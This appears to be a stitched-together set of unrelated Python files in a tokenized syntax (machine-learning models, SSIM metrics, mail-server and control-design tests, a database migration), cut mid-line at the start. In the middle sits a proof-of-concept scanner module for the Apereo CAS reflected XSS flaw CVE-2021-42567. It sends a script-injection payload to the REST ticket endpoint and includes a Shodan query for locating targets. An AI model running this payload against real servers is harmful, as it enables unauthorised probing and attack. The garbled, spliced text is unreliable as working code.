wait')<as>c<block_start>c.argument('trigger_name' options_list=['--name' '-n'] id_part='child_name_2' help='The name of the trigger.')<block_end><block_end># modified
<import_stmt>os<import_stmt>random<import_stmt>numpy<as>np<import_from_stmt>collections Counter<import_from_stmt>sklearn.metrics r2_score<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>torch.optim<as>optim<import_from_stmt>torch.optim.lr_scheduler ReduceLROnPlateau<import_stmt>torch.nn.functional<as>F<import_from_stmt>.models.graph_clf GraphClf<import_from_stmt>.models.text_graph TextGraphRegression TextGraphClf<import_from_stmt>.utils.text_data.vocab_utils VocabModel<import_from_stmt>.utils constants<as>Constants<import_from_stmt>.utils.generic_utils to_cuda create_mask<import_from_stmt>.utils.constants INF<import_from_stmt>.utils.radam RAdam<class_stmt>Model(object)<block_start>"""High level model that handles intializing the underlying network architecture, saving, updating examples, and predicting examples. """<def_stmt>__init__ self config train_set=<none><block_start>self.config=config<if_stmt>self.config['model_name']<eq>'GraphClf'<block_start>self.net_module=GraphClf<block_end><elif_stmt>self.config['model_name']<eq>'TextGraphRegression'<block_start>self.net_module=TextGraphRegression<block_end><elif_stmt>self.config['model_name']<eq>'TextGraphClf'<block_start>self.net_module=TextGraphClf<block_end><else_stmt><block_start><raise>RuntimeError('Unknown model_name: {}'.format(self.config['model_name']))<block_end>print('[ Running {} model ]'.format(self.config['model_name']))<if_stmt>config['data_type']<eq>'text'<block_start>saved_vocab_file=os.path.join(config['data_dir'] '{}_seed{}.vocab'.format(config['dataset_name'] config.get('data_seed' 1234)))<line_sep>self.vocab_model=VocabModel.build(saved_vocab_file train_set self.config)<block_end><if_stmt>config['task_type']<eq>'regression'<block_start><assert_stmt>config['out_predictions']<line_sep>self.criterion=F.mse_loss<line_sep>self.score_func=r2_score<line_sep>self.metric_name='r2'<block_end><elif_stmt>config['task_type']<eq>'classification'<block_start>self.criterion=F.nll_loss<line_sep>self.score_func=accuracy<line_sep>self.metric_name='acc'<block_end><else_stmt><block_start>self.criterion=F.nll_loss<line_sep>self.score_func=<none><line_sep>self.metric_name=<none><block_end><if_stmt>self.config['pretrained']<block_start>self.init_saved_network(self.config['pretrained'])<block_end><else_stmt># Building network. <block_start>self._init_new_network()<block_end>num_params=0<for_stmt>name,p self.network.named_parameters()<block_start>print('{}: {}'.format(name str(p.size())))<line_sep>num_params<augadd>p.numel()<block_end>print('#Parameters = {}\n'.format(num_params))<line_sep>self._init_optimizer()<block_end><def_stmt>init_saved_network self saved_dir<block_start>_ARGUMENTS=['word_embed_dim' 'hidden_size' 'f_qem' 'f_pos' 'f_ner' 'word_dropout' 'rnn_dropout' 'ctx_graph_hops' 'ctx_graph_topk' 'score_unk_threshold' 'score_yes_threshold' 'score_no_threshold']<line_sep># Load all saved fields. fname=os.path.join(saved_dir Constants._SAVED_WEIGHTS_FILE)<line_sep>print('[ Loading saved model %s ]'%fname)<line_sep>saved_params=torch.load(fname map_location=<lambda>storage loc:storage)<line_sep>self.state_dict=saved_params['state_dict']<line_sep># for k in _ARGUMENTS: # if saved_params['config'][k] != self.config[k]: # print('Overwrite {}: {} -> {}'.format(k, self.config[k], saved_params['config'][k])) # self.config[k] = saved_params['config'][k] <if_stmt>self.config['data_type']<eq>'text'<block_start>w_embedding=self._init_embedding(len(self.vocab_model.word_vocab) self.config['word_embed_dim'])<line_sep>self.network=self.net_module(self.config w_embedding self.vocab_model.word_vocab)<block_end><else_stmt><block_start>self.network=self.net_module(self.config)<block_end># Merge the arguments <if_stmt>self.state_dict<block_start>merged_state_dict=self.network.state_dict()<for_stmt>k,v self.state_dict['network'].items()<block_start><if_stmt>k<in>merged_state_dict<block_start>merged_state_dict[k]=v<block_end><block_end>self.network.load_state_dict(merged_state_dict)<block_end><block_end><def_stmt>_init_new_network self<block_start><if_stmt>self.config['data_type']<eq>'text'<block_start>w_embedding=self._init_embedding(len(self.vocab_model.word_vocab) self.config['word_embed_dim'] pretrained_vecs=self.vocab_model.word_vocab.embeddings)<line_sep>self.network=self.net_module(self.config w_embedding self.vocab_model.word_vocab)<block_end><else_stmt><block_start>self.network=self.net_module(self.config)<block_end><block_end><def_stmt>_init_optimizer self<block_start>parameters=[p<for>p self.network.parameters()<if>p.requires_grad]<if_stmt>self.config['optimizer']<eq>'sgd'<block_start>self.optimizer=optim.SGD(parameters self.config['learning_rate'] momentum=self.config['momentum'] weight_decay=self.config['weight_decay'])<block_end><elif_stmt>self.config['optimizer']<eq>'adam'<block_start>self.optimizer=optim.Adam(parameters lr=self.config['learning_rate'] weight_decay=self.config['weight_decay'])<block_end><elif_stmt>self.config['optimizer']<eq>'adamax'<block_start>self.optimizer=optim.Adamax(parameters lr=self.config['learning_rate'])<block_end><elif_stmt>self.config['optimizer']<eq>'radam'<block_start>self.optimizer=RAdam(parameters lr=self.config['learning_rate'] weight_decay=self.config['weight_decay'])<block_end><else_stmt><block_start><raise>RuntimeError('Unsupported optimizer: %s'%self.config['optimizer'])<block_end>self.scheduler=ReduceLROnPlateau(self.optimizer mode='max' factor=self.config['lr_reduce_factor'] patience=self.config['lr_patience'] verbose=<true>)<block_end><def_stmt>_init_embedding self vocab_size embed_size pretrained_vecs=<none><block_start>"""Initializes the embeddings """<line_sep><return>nn.Embedding(vocab_size embed_size padding_idx=0 _weight=torch.from_numpy(pretrained_vecs).float()<if>pretrained_vecs<is><not><none><else><none>)<block_end><def_stmt>save self dirname<block_start>params={'state_dict':{'network':self.network.state_dict() } 'config':self.config 'dir':dirname }<try_stmt><block_start>torch.save(params os.path.join(dirname Constants._SAVED_WEIGHTS_FILE))<block_end><except_stmt>BaseException<block_start>print('[ WARN: Saving failed... continuing anyway. ]')<block_end><block_end><def_stmt>clip_grad self# Clip gradients <block_start><if_stmt>self.config['grad_clipping']<block_start>parameters=[p<for>p self.network.parameters()<if>p.requires_grad]<line_sep>torch.nn.utils.clip_grad_norm_(parameters self.config['grad_clipping'])<block_end><block_end><block_end><def_stmt>train_batch batch network vocab criterion forcing_ratio rl_ratio config wmd=<none><block_start>network.train(<true>)<with_stmt>torch.set_grad_enabled(<true>)<block_start>ext_vocab_size=batch['oov_dict'].ext_vocab_size<if>batch['oov_dict']<else><none><line_sep>network_out=network(batch batch['targets'] criterion forcing_ratio=forcing_ratio partial_forcing=config['partial_forcing'] sample=config['sample'] ext_vocab_size=ext_vocab_size include_cover_loss=config['show_cover_loss'])<if_stmt>rl_ratio<g>0<block_start>batch_size=batch['context'].shape[0]<line_sep>sample_out=network(batch saved_out=network_out criterion=criterion criterion_reduction=<false> criterion_nll_only=<true> sample=<true> ext_vocab_size=ext_vocab_size)<line_sep>baseline_out=network(batch saved_out=network_out visualize=<false> ext_vocab_size=ext_vocab_size)<line_sep>sample_out_decoded=sample_out.decoded_tokens.transpose(0 1)<line_sep>baseline_out_decoded=baseline_out.decoded_tokens.transpose(0 1)<line_sep>neg_reward=[]<for_stmt>i range(batch_size)<block_start>scores=eval_batch_output([batch['target_src'][i]] vocab batch['oov_dict'] [sample_out_decoded[i]] [baseline_out_decoded[i]])<line_sep>greedy_score=scores[1][config['rl_reward_metric']]<line_sep>reward_=scores[0][config['rl_reward_metric']]-greedy_score<if_stmt>config['rl_wmd_ratio']<g>0# Add word mover's distance <block_start>sample_seq=batch_decoded_index2word([sample_out_decoded[i]] vocab batch['oov_dict'])[0]<line_sep>greedy_seq=batch_decoded_index2word([baseline_out_decoded[i]] vocab batch['oov_dict'])[0]<line_sep>sample_wmd=-wmd.distance(sample_seq batch['target_src'][i])/max(len(sample_seq.split()) 1)<line_sep>greedy_wmd=-wmd.distance(greedy_seq batch['target_src'][i])/max(len(greedy_seq.split()) 1)<line_sep>wmd_reward_=sample_wmd-greedy_wmd<line_sep>wmd_reward_=max(min(wmd_reward_ config['max_wmd_reward']) -config['max_wmd_reward'])<line_sep>reward_<augadd>config['rl_wmd_ratio']<times>wmd_reward_<block_end>neg_reward.append(reward_)<block_end>neg_reward=to_cuda(torch.Tensor(neg_reward) network.device)<line_sep># if sample > baseline, the reward is positive (i.e. good exploration), rl_loss is negative rl_loss=torch.sum(neg_reward<times>sample_out.loss)/batch_size<line_sep>rl_loss_value=torch.sum(neg_reward<times>sample_out.loss_value).item()/batch_size<line_sep>loss=(1-rl_ratio)<times>network_out.loss+rl_ratio<times>rl_loss<line_sep>loss_value=(1-rl_ratio)<times>network_out.loss_value+rl_ratio<times>rl_loss_value<line_sep>metrics=eval_batch_output(batch['target_src'] vocab batch['oov_dict'] baseline_out.decoded_tokens)[0]<block_end><else_stmt><block_start>loss=network_out.loss<line_sep>loss_value=network_out.loss_value<line_sep>metrics=eval_batch_output(batch['target_src'] vocab batch['oov_dict'] network_out.decoded_tokens)[0]<block_end><block_end><return>loss loss_value metrics<block_end><def_stmt>accuracy labels output<block_start>preds=output.max(1)[1].type_as(labels)<line_sep>correct=preds.eq(labels).double()<line_sep>correct=correct.sum().item()<line_sep><return>correct/len(labels)<block_end>
<import_stmt>requests<line_sep># Vuln Base Info <def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Apereo CAS Reflected Cross-Site Scripting''' "description":'''Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.''' "severity":"medium" "references":["https://apereo.github.io/2021/10/18/restvuln/" "https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html" "https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md" "https://nvd.nist.gov/vuln/detail/CVE-2021-42567" "https://github.com/apereo/cas/releases"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" "cvss-score":"" "cve-id":"CVE-2021-42567" "cwe-id":"CWE-79"} "metadata":{"vuln-target":"" "shodan-query":"""http.title:'CAS - Central Authentication Service'"""} "tags":["cve" "cve2021" "apereo" "xss" "cas"] }<block_end># Vender Fingerprint <def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept <def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/cas/v1/tickets/"""<line_sep>method="POST"<line_sep>data="""username=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=<PASSWORD>"""<line_sep>headers={'Content-Type':'application/x-www-form-urlencoded'}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>("""<img/src/onerror=alert(document.domain)>"""<in>resp0.text<and>"""java.util.HashMap"""<in>resp0.text)<and>(resp0.status_code<eq>401)<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc() <def_stmt>exp url<block_start><return>poc(url)<block_end># Utils <def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
<import_stmt>tensorflow<as>tf<import_from_stmt>.layer *<class_stmt>Discriminator<block_start><def_stmt>__init__ self inputs targets ndf=64<block_start>n_layers=3<line_sep>layers=[]<line_sep>input=tf.concat([inputs targets] axis=3)<with_stmt>tf.variable_scope('layer_1')<block_start>convolved=discrim_conv(input ndf stride=2)<line_sep>rectified=lrelu(convolved 0.2)<line_sep>layers.append(rectified)<block_end><for_stmt>i range(n_layers)<block_start><with_stmt>tf.variable_scope('layer_%d'%(len(layers)+1))<block_start>out_channels=ndf<times>min(2<power>(i+1) 8)<line_sep>stride=1<if>i<eq>n_layers-1<else>2<line_sep>convolved=discrim_conv(layers[-1] out_channels stride=stride)<line_sep>normalized=batchnorm(convolved)<line_sep>rectified=lrelu(normalized 0.2)<line_sep>layers.append(rectified)<block_end><block_end><with_stmt>tf.variable_scope('layer_%d'%(len(layers)+1))<block_start>convolved=discrim_conv(rectified out_channels=1 stride=1)<line_sep>output=tf.sigmoid(convolved)<line_sep>layers.append(output)<block_end>self.logits=layers[-1]<block_end><block_end>
<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<def_stmt>_tf_fspecial_gauss size sigma ch=1<block_start>"""Function to mimic the 'fspecial' gaussian MATLAB function """<line_sep>x_data,y_data=np.mgrid[-size<floordiv>2+1:size<floordiv>2+1 -size<floordiv>2+1:size<floordiv>2+1]<line_sep>x_data=np.expand_dims(x_data axis=-1)<line_sep>x_data=np.expand_dims(x_data axis=-1)<line_sep>y_data=np.expand_dims(y_data axis=-1)<line_sep>y_data=np.expand_dims(y_data axis=-1)<line_sep>x=tf.constant(x_data dtype=tf.float32)<line_sep>y=tf.constant(y_data dtype=tf.float32)<line_sep>g=tf.exp(-((x<power>2+y<power>2)/(2.0<times>sigma<power>2)))<line_sep>g=tf.tile(g [1 1 ch 1])<line_sep><return>g/tf.reduce_sum(g)<block_end><def_stmt>tf_ssim img1 img2 cs_map=<false> mean_metric=<true> size=11 sigma=0.5<block_start>img1=tf.image.rgb_to_grayscale(img1)<line_sep>img2=tf.image.rgb_to_grayscale(img2)<line_sep>window=_tf_fspecial_gauss(size sigma ch=img1.get_shape().as_list()[-1])<line_sep># window shape [size, size] K1=0.01<line_sep>K2=0.03<line_sep>L=1# depth of image (255 in case the image has a differnt scale) C1=(K1<times>L)<power>2<line_sep>C2=(K2<times>L)<power>2<line_sep>mu1=tf.nn.conv2d(img1 window strides=[1 1 1 1] padding='VALID')<line_sep>mu2=tf.nn.conv2d(img2 window strides=[1 1 1 1] padding='VALID')<line_sep>mu1_sq=mu1<times>mu1<line_sep>mu2_sq=mu2<times>mu2<line_sep>mu1_mu2=mu1<times>mu2<line_sep>sigma1_sq=tf.nn.conv2d(img1<times>img1 window strides=[1 1 1 1] padding='VALID')-mu1_sq<line_sep>sigma2_sq=tf.nn.conv2d(img2<times>img2 window strides=[1 1 1 1] padding='VALID')-mu2_sq<line_sep>sigma12=tf.nn.conv2d(img1<times>img2 window strides=[1 1 1 1] padding='VALID')-mu1_mu2<if_stmt>cs_map<block_start>value=(((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2)) (2.0<times>sigma12+C2)/(sigma1_sq+sigma2_sq+C2))<block_end><else_stmt><block_start>value=((2<times>mu1_mu2+C1)<times>(2<times>sigma12+C2))/((mu1_sq+mu2_sq+C1)<times>(sigma1_sq+sigma2_sq+C2))<block_end><if_stmt>mean_metric<block_start>value=tf.reduce_mean(value)<block_end><return>value<block_end><def_stmt>tf_ms_ssim img1 img2 mean_metric=<true> level=5<block_start>weight=tf.constant([0.0448 0.2856 0.3001 0.2363 0.1333] dtype=tf.float32)<line_sep>mssim=[]<line_sep>mcs=[]<for_stmt>l range(level)<block_start>ssim_map,cs_map=tf_ssim(img1 img2 cs_map=<true> mean_metric=<false>)<line_sep>mssim.append(tf.reduce_mean(ssim_map))<line_sep>mcs.append(tf.reduce_mean(cs_map))<line_sep>filtered_im1=tf.nn.avg_pool(img1 [1 2 2 1] [1 2 2 1] padding='SAME')<line_sep>filtered_im2=tf.nn.avg_pool(img2 [1 2 2 1] [1 2 2 1] padding='SAME')<line_sep>img1=filtered_im1<line_sep>img2=filtered_im2<block_end># list to tensor of dim D+1 mssim=tf.pack(mssim axis=0)<line_sep>mcs=tf.pack(mcs axis=0)<line_sep>value=(tf.reduce_prod(mcs[0:level-1]<power>weight[0:level-1])<times>(mssim[level-1]<power>weight[level-1]))<if_stmt>mean_metric<block_start>value=tf.reduce_mean(value)<block_end><return>value<block_end>
<import_stmt>time<import_stmt>unittest<import_from_stmt>mox3.mox MoxTestBase<import_from_stmt>slimta.edge Edge EdgeServer<class_stmt>TestEdge(MoxTestBase unittest.TestCase)<block_start><def_stmt>test_handoff self<block_start>self.mox.StubOutWithMock(time 'time')<line_sep>env=self.mox.CreateMockAnything()<line_sep>queue=self.mox.CreateMockAnything()<line_sep>time.time().AndReturn(12345)<line_sep>queue.enqueue(env).AndReturn('asdf')<line_sep>self.mox.ReplayAll()<line_sep>edge=Edge(queue 'test.example.com')<line_sep>self.assertEqual('asdf' edge.handoff(env))<line_sep>self.assertEqual('test.example.com' env.receiver)<line_sep>self.assertEqual(12345 env.timestamp)<block_end><def_stmt>test_handoff_error self<block_start>env=self.mox.CreateMockAnything()<line_sep>queue=self.mox.CreateMockAnything()<line_sep>queue.enqueue(env).AndRaise(RuntimeError)<line_sep>self.mox.ReplayAll()<line_sep>edge=Edge(queue)<with_stmt>self.assertRaises(RuntimeError)<block_start>edge.handoff(env)<block_end><block_end><def_stmt>test_kill self<block_start>queue=self.mox.CreateMockAnything()<line_sep>self.mox.ReplayAll()<line_sep>edge=Edge(queue)<line_sep>edge.kill()<block_end><block_end><class_stmt>TestEdgeServer(MoxTestBase unittest.TestCase)<block_start><def_stmt>test_edge_interface self<block_start>edge=EdgeServer(('127.0.0.1' 0) <none>)<with_stmt>self.assertRaises(NotImplementedError)<block_start>edge.handle(<none> <none>)<block_end><block_end><def_stmt>test_handle self<block_start>queue=self.mox.CreateMockAnything()<line_sep>sock=self.mox.CreateMockAnything()<line_sep>edge=EdgeServer(('127.0.0.1' 0) queue)<line_sep>self.mox.StubOutWithMock(edge 'handle')<line_sep>sock.fileno().AndReturn(15)<line_sep>edge.handle(sock 'test address')<line_sep>self.mox.ReplayAll()<try_stmt><block_start>edge.server.pre_start()<block_end><except_stmt>AttributeError<block_start>edge.server.init_socket()<block_end>edge._handle(sock 'test address')<block_end><def_stmt>test_handle_error self<block_start>queue=self.mox.CreateMockAnything()<line_sep>sock=self.mox.CreateMockAnything()<line_sep>edge=EdgeServer(('127.0.0.1' 0) queue)<line_sep>self.mox.StubOutWithMock(edge 'handle')<line_sep>sock.fileno().AndReturn(15)<line_sep>edge.handle(sock 5).AndRaise(RuntimeError)<line_sep>self.mox.ReplayAll()<try_stmt><block_start>edge.server.pre_start()<block_end><except_stmt>AttributeError<block_start>edge.server.init_socket()<block_end><with_stmt>self.assertRaises(RuntimeError)<block_start>edge._handle(sock 5)<block_end><block_end><def_stmt>test_kill self<block_start>edge=EdgeServer(('127.0.0.1' 0) <none>)<line_sep>self.mox.StubOutWithMock(edge.server 'stop')<line_sep>edge.server.stop()<line_sep>self.mox.ReplayAll()<line_sep>edge.kill()<block_end><def_stmt>test_run self<block_start>edge=EdgeServer(('127.0.0.1' 0) <none>)<line_sep>self.mox.StubOutWithMock(edge.server 'start')<line_sep>self.mox.StubOutWithMock(edge.server 'serve_forever')<line_sep>edge.server.start()<line_sep>edge.server.serve_forever()<line_sep>self.mox.ReplayAll()<line_sep>edge._run()<block_end><block_end># vim:et:fdm=marker:sts=4:sw=4:ts=4
<import_from_stmt>numpy eye array sort empty<import_from_stmt>scipy.linalg block_diag eigvals<import_from_stmt>scipy.signal.filter_design _cplxpair<import_from_stmt>numpy.testing assert_almost_equal assert_array_almost_equal assert_array_equal <import_from_stmt>pytest raises<as>assert_raises<import_from_stmt>harold lqr ackermann State Transfer haroldcompanion<import_from_stmt>harold._static_ctrl_design _get_pole_reps<def_stmt>test_lqr_arguments # First arg is not LTI <block_start>assert_raises(ValueError lqr 1 1)<line_sep># Static Gain assert_raises(ValueError lqr State(1) 1)<line_sep># Wrong string assert_raises(ValueError lqr Transfer(1 [1 1]) 1 weight_on='asdf')<line_sep># scalar matrices H=Transfer(1 [1 1])<line_sep>k,x,e=lqr(H 3)<line_sep>assert_almost_equal(array([k[0 0] x[0 0] e[0]]) [1 1 -2+0j])<block_end><def_stmt>test_simple_lqr # Example taken from <NAME>'s MAE280B lecture notes <block_start>H=State([[0 0 1 0] [0 0 0 1] [4.03428022844288e-06 0 0 0.0515652322798669] [0 0 -0.000104315254033883 0]] [[0 0] [1e-5/3 0] [0 0] [0 0.01]] eye(4))<line_sep>k,_,_=lqr(H[: 1] eye(4))<line_sep>H.a=H.a.T<line_sep>f,_,_=lqr(H[: 0] block_diag(0 0 1e-5 1e-5) 0.1)<line_sep>assert_almost_equal(k array([[1.00554916 -1 52.52180106 18.51107167]]))<line_sep>assert_almost_equal(f array([[-577.370350 173.600463 0.383744946 0.050228534]]) decimal=5)<block_end><def_stmt>test_simple_lqry # Scalar matrices <block_start>H=State(1 1 1 1)<line_sep>k,x,e=lqr(H Q=3 weight_on='output')<line_sep>assert_almost_equal(array([k[0 0] x[0 0] e[0]]) [1.5 3 -0.5+0j])<line_sep># Wrong S shape assert_raises(ValueError lqr H Q=3 S=eye(2) weight_on='output')<block_end><def_stmt>test_simple_dlqr # Example taken from <NAME>'s MAE280B lecture notes <block_start>H=State([[0 0 1 0] [0 0 0 1] [4.03428022844288e-06 0 0 0.0515652322798669] [0 0 -0.000104315254033883 0]] [[0 0] [1e-5/3 0] [0 0] [0 0.01]] eye(4) dt=0.1)<line_sep>k,_,_=lqr(H[: 1] eye(4))<line_sep>H.a=H.a.T<line_sep>f,_,_=lqr(H[: 0] block_diag(0 0 1e-5 1e-5) 0.1)<line_sep>assert_almost_equal(k array([[0 0 -2.08727337333631e-06 0]]))<line_sep>assert_almost_equal(f array([[1.71884123e-11 0 0 -1.79301359e-15]]))<block_end><def_stmt>test_ackermann_args # Not SIxO system <block_start>G=State(eye(2) eye(2) eye(2))<line_sep>assert_raises(ValueError ackermann G [1 2])<line_sep># Wrong # of poles G=State(eye(2) [[1] [0]] [1 0])<line_sep>assert_raises(ValueError ackermann G [1 2 3])<block_end><def_stmt>test_ackermann_controllable # <block_start>A=haroldcompanion([1 6 5 1])<line_sep>B=eye(3)[: [-1]]<line_sep>p=[-10 -9 -8]<line_sep>K=ackermann((A B) p)<line_sep>pa=eigvals(A-B@K)<line_sep>assert_array_almost_equal(array(p dtype=complex) sort(pa))<block_end><def_stmt>test_ackermann_uncontrollable <block_start>A=block_diag(haroldcompanion([1 6 5 1]) 1)<line_sep>B=eye(4)[: [-2]]<line_sep>p=[-10 -9 -8 -7]<line_sep>assert_raises(ValueError ackermann (A B) p)<block_end><def_stmt>byersnash_A_B_test_pairs <block_start>ABs=[# Chemical Reactor (Munro 1979) (array([[1.38 -0.2077 6.715 -5.676] [-0.5814 -4.29 0 0.675] [1.067 4.273 -6.654 5.893] [0.048 4.273 1.343 -2.104]]) array([[0 0] [5.679 0] [1.136 -3.146] [1.136 0]])) # Distillation Column (<NAME> 1977) (array([[-0.1094 0.0628 0 0 0] [1.306 -2.132 0.9807 0 0] [0 1.595 -3.149 1.547 0] [0 0.0355 2.632 -4.257 1.855] [0 0.0023 0 0.1636 -0.1625]]) array([[0 0] [0.638 0] [0.0838 -0.1396] [0.1004 -0.206] [0.0063 -0.0128]])) # Nuclear rocket engine (<NAME> 1974) (array([[-65.0 65 -19.5 19.5] [0.1 -0.1 0 0] [1 0 -0.5 -1] [0 0 0.4 0]]) array([[65. 0] [0 0] [0 0] [0 0.4]])) # MIMO system (Atkinson, 1985) (array([[0 1 0] [0 0 1] [-6 -11 -6]]) array([[1 1] [0 1] [1 1]])) # Drum boiler (Bengtsson 1973) (array([[-0.129 0 0.396 0.25 0.00191] [0.0329 0 -0.00779 0.0122 -0.621] [0.00718 0 -0.1 0.000887 -0.0385] [0.00411 0 0 -0.0822 0] [0.00351 0 0.0035 0.00426 -0.0743]]) array([[0 0.1390] [0 0.0359] [0 -0.0989] [0.0249 0] [0 -0.00534]])) # Miminis random example #1 (array([[5.8765 9.3456 4.5634 9.3520] [6.6526 0.5867 3.5829 0.6534] [0.0000 9.6738 7.4876 4.7654] [0.0000 0.0000 6.6784 2.5678]]) array([[3.9878 0.5432] [0.0000 2.7650] [0.0000 0.0000] [0.0000 0.0000]])) # Miminis random example #2 (array([[.5257 .8544 .5596 .5901 .0259 .6213 .7227 .5617] [.9931 .0643 .1249 .3096 .5174 .3455 .8977 .4682] [.6489 .8279 .7279 .2552 .3917 .7065 .2428 .7795] [.9923 .9262 .2678 .6252 .2414 .5211 .4338 .9677] [.0000 .5667 .5465 .1157 .5064 .2870 .7901 .9809] [.0000 .0000 .8672 .6117 .4236 .6503 .5069 .8187] [.0000 .0000 .0000 .0000 .2894 .0881 .5233 .4257] [.0000 .0000 .0000 .0000 .0000 .4499 .5597 .2462]]) array([[0.9230 0.3950 0.8325] [0.0000 0.0366 0.6105] [0.0000 0.0000 0.1871] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000] [0.0000 0.0000 0.0000]])) # Aircraft control example I (Kautsky and Nichols 1983) (array([[0 1 0 0] [1.40e-4 -2.04 -1.95 -1.33e-2] [-2.51e-4 1 -1.32 -2.38e-2] [-5.61e-1 0 0.358 -2.79e-1]]) array([[0 0 0] [-5.33 6.45e-3 -2.67e-1] [-1.60e-1 -1.16e-2 -2.51e-1] [0 1.06e-1 8.62e-2]])) # Aircraft control example II (Kautsky and Nichols 1983) (array([[0 1 0 0] [5.32e-7 -4.18e-1 -0.12 -2.32e-2] [-4.62e-9 1 -0.752 -2.39e-2] [-5.61e-1 0 0.3 -1.74e-2]]) array([[0 0] [-1.72e-1 7.45e-6] [-2.82e-2 -7.78e-5] [0 3.69e-3]])) # Symmetric example (Kautsky and Nichols 1983) (array([[-3.624 4.9567e-2 -2.4564e-1 1.3853e-2] [3.3486e-1 -1.8875 -8.1251e-1 -2.8102e-1] [-1.9958e-1 -1.1335 -2.2039 -4.5523e-1] [1.3784e-1 -4.7140e-1 -3.3229e-1 -4.0605]]) array([[2.3122e-1 3.0761e-1 3.6164e-1 3.3217e-1] [8.8339e-1 2.1460e-1 5.6642e-1 5.0153e-1]]).T) # Ad-hoc ill-conditioned example (Byers and Nash 1989) (array([[0 0 0 0] [1 10 100 1000] [0 1 10 100] [0 0 1 10]]) array([[1 0] [0 1] [0 0] [0 0]]))]<line_sep># Return a generator <return>(x<for>x ABs)<block_end><def_stmt>_test_get_pole_reps # Only complex <block_start>p=array([1.+1j 1-1j 2.+1j 2-1j])<line_sep>pr,nc,nr=_get_pole_reps(p)<for_stmt>x range(2)<block_start>assert_array_equal(pr[x] empty((0 2)))<block_end><assert_stmt>nc<eq>4<assert_stmt>nr<eq>0<line_sep># Only real p=array([1 2 3])<line_sep>pr,nc,nr=_get_pole_reps(p)<for_stmt>x range(2)<block_start>assert_array_equal(pr[x] empty((0 2)))<block_end><assert_stmt>nc<eq>0<assert_stmt>nr<eq>3<line_sep># Mixed, no reps p=array([1.+1j 1-1j 3])<line_sep>pr,nc,nr=_get_pole_reps(p)<for_stmt>x range(2)<block_start>assert_array_equal(pr[x] empty((0 2)))<block_end><assert_stmt>nc<eq>2<assert_stmt>nr<eq>1<line_sep># Mixed, complex reps p=array([1.+1j 1-1j 1.+1j 1-1j 3])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] array([[0 2]]))<line_sep>assert_array_equal(pr[1] empty((0 2)))<assert_stmt>nc<eq>4<assert_stmt>nr<eq>1<line_sep># Mixed real reps p=array([1.+1j 1-1j 1. 1])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] empty((0 2)))<line_sep>assert_array_equal(pr[1] array([[2 4]]))<assert_stmt>nc<eq>2<assert_stmt>nr<eq>2<line_sep># Mixed real reps, real dangling p=array([1.+1j 1-1j 1. 1 0.54 3.8])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] empty((0 2)))<line_sep>assert_array_equal(pr[1] array([[3 5]]))<assert_stmt>nc<eq>2<assert_stmt>nr<eq>4<line_sep># Mixed complex reps, complex dangling p=array([1.+1j 1-1j 1.+1j 1-1j 0.+1j 0-1j 0.5 3.])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] array([[1 3]]))<line_sep>assert_array_equal(pr[1] empty((0 2)))<assert_stmt>nc<eq>6<assert_stmt>nr<eq>2<line_sep># Mixed reps and dangling p=array([1.+1j 1-1j 1.+1j 1-1j 2.+1j 2-1j 3.+1j 3-1j 3.+1j 3-1j 3.+1j 3-1j 4.+1j 4-1j 0 0.5 0.5 3. 6 6 6])<line_sep>p=_cplxpair(p).conj()<line_sep>pr,nc,nr=_get_pole_reps(p)<line_sep>assert_array_equal(pr[0] array([[0 2] [3 6]]))<line_sep>assert_array_equal(pr[1] array([[15 17] [18 21]]))<assert_stmt>nc<eq>14<assert_stmt>nr<eq>7<block_end>
"""0.10.0 create new schedule tables Revision ID: 8ccbed5060b8 Revises: <PASSWORD> Create Date: 2021-01-13 12:56:41.971500 """<import_from_stmt>dagster.core.storage.migration.utils create_0_10_0_schedule_tables<line_sep># revision identifiers, used by Alembic. revision="8ccbed5060b8"<line_sep>down_revision="<PASSWORD>"<line_sep>branch_labels=<none><line_sep>depends_on=<none><def_stmt>upgrade <block_start>create_0_10_0_schedule_tables()<block_end><def_stmt>downgrade <block_start><pass><block_end>
